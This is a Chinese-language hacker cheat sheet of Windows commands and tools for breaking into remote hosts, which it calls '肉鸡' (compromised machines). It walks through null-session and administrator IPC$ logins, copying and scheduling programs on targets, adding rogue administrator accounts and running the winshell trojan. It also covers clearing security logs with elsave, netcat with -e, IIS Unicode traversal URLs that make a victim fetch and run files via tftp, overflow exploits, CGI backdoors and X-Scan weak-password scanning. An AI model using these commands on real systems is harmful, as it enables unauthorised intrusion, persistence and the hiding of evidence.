黑客常用的NET命令

常用的几条 NET 命令：
==================================================

（与远程主机建立空管连接） net use \\IP 地址 \ipc$ "" /use:""

（以管理员身份登录远程主机） net use \\IP 地址 \ipc$ " 密码 " /use:"Administrator"

（传送文件到远程主机 WINNT 目录下） copy 本机目录路径 \ 程序 \\IP 地址 \admin$

（查看远程主机时间） net time \\IP 地址

（定时启动某个程序） at \\IP 地址 02:18 readme.exe

（查看共享） net view \\IP 地址

（查看 netbios 工作组列表） nbtstat -A IP 地址

（将远程主机 C 盘映射为自己的 F 盘） net use f: \\IP 地址 \c$ ""/user:"Administrator"

（这两条把自己增加到管理员组）： net user 用户名 密码 /add

net localgroup Administrators 用户名 /add

（断开连接） net use \\IP 地址 \ipc$ /delete

============================
一、 netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的 “ 时间任务 ” 服务：

netsvc /list \\IP 地址

netsvc schedule \\IP 地址 /query

netsvc \\IP 地址 schedule /start

二、 OpenTelnet.exe

远程启动主机的 Telnet 服务，并绑定端口到 7878 ，例如：

OpenTelnet \\IP 地址 用户名 密码 1 7878

然后就可以 telnet 到主机的 7878 端口，进入 DOS 方式下：

telnet IP 地址 7878

三、 winshell.exe

一个非常小的木马（不到 6K ）， telnet 到主机的 7878 端口，输入密码 winshell ，当看到 CMD> 后，可打下面的命令：

p Path （查看 winshell 主程序的路径信息）

b reBoot （重新启动机器）

d shutDown （关闭机器）

s Shell （执行后你就会看到可爱的 “C:\>” ）

x eXit （退出本次登录会话，此命令并不终止 winshell 的运行）

CMD> [url]http://.../srv.exe[/url] （通过 http 下载其他网站上的文件到运行 winshell 的机器上）

四、 3389 登陆器， GUI 方式登录远程主机的

五、 elsave.exe

事件日志清除工具

elsave -s \\IP 地址 -l "application" -C

elsave -s \\IP 地址 -l "system" -C

elsave -s \\IP 地址 -l "security" -C

执行后成功清除应用程序日志，系统日志，安全日志

六、 hbulot.exe

开启 win2kserver 和 winxp 的 3389 服务

hbulot [/r]

使用 /r 表示安装完成后自动重起目标使设置生效。

七、 nc.exe(netcat.exe)

一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。

想要连接到某处 : nc [-options] hostname port[s] [ports] ...

绑定端口等待连接 : nc -l -p port [-options] [hostname] [port]

参数 :

-e prog 程序重定向，一旦连接，就执行 [ 危险 !!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 帮助信息

-i secs 延时的间隔

-l 监听模式，用于入站连接

-n 指定数字的 IP 地址，不能用 hostname

-o file 记录 16 进制的传输

-p port 本地端口号

-r 任意指定本地及远程端口

-s addr 本地源地址

-u UDP 模式

-v 详细输出 ―― 用两个 -v 可得到更详细的内容

-w secs timeout 的时间

-z 将输入输出关掉 ―― 用于扫描时

八、 TFTPD32.EXE

把自己的电脑临时变为一台 FTP 服务器，让肉鸡来下载文件， tftp 命令要在肉鸡上执行，通常要利用 Unicode 漏洞或 telnet 到肉鸡，例如：

[url]http://IP[/url] 地址 /s cripts/..% 255c ..% 255c /winnt/system32/cmd.exe?/c tftp -i 本机 IP 地址 get 文件名 c:\winnt\system32\ 文件名

然后可以直接令文件运行：

[url]http://IP[/url] 地址 /s cripts/..% 255c ..% 255c /winnt/system32/cmd.exe?/c+ 文件名

九、 prihack.exe 是 IIS 的 printer 远程缓冲区溢出工具。 idqover.exe 是溢出 idq 的，选择 “ 溢出后在一个端口监听 ” ，然后用 telnet 连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。 xploit.exe 是一个图形界面的 ida 溢出，成功以后 winxp 下需要打 winxp 。

一 ○ 、 ntis.exe 、 cmd.exe 和 cmdasp.asp 是三个 cgi-backdoor ， exe 要放到 cgi-bin 目录下， asp 放到有 ASP 执行权限的目录。然后用 IE 浏览器连接。

一、一 Xscan 命令行运行参数说明：

在检测过程中，按 "[ 空格 ]" 键可以查看各线程状态及扫描进度，按 "q" 键保存当前数据后提前退出程序，按 "" 强行关闭程序。

1. 命令格式 : xscan -host [-]  [ 其他选项 ]

xscan -file   [ 其他选项 ]

其中 含义如下 :

-port : 检测常用服务的端口状态 ( 可通过 \dat\config.ini 文件的 "PORT-SCAN-OPTIONS\PORT-LIST" 项定制待检测端口列表 ) ；

-ftp : 检测 FTP 弱口令 ( 可通过 \dat\config.ini 文件设置用户名 / 密码字典文件 ) ；

-ntpass : 检测 NT-Server 弱口令 ( 可通过 \dat\config.ini 文件设置用户名 / 密码字典文件 ) ；

-cgi : 检测 CGI 漏洞 ( 可通过 \dat\config.ini 文件的 "CGI-ENCODE\encode_type" 项设置编码方案 ) ；

-iis : 检测 IIS 漏洞 ( 可通过 \dat\config.ini 文件的 "CGI-ENCODE\encode_type" 项设置编码方案 ) ；

[ 其他选项 ] 含义如下 :

-v: 显示详细扫描进度

-p: 跳过 Ping 不通的主机

-o: 跳过没有检测到开放端口的主机

-t : 指定最大并发线程数量和并发主机数量 , 默认数量为 100,10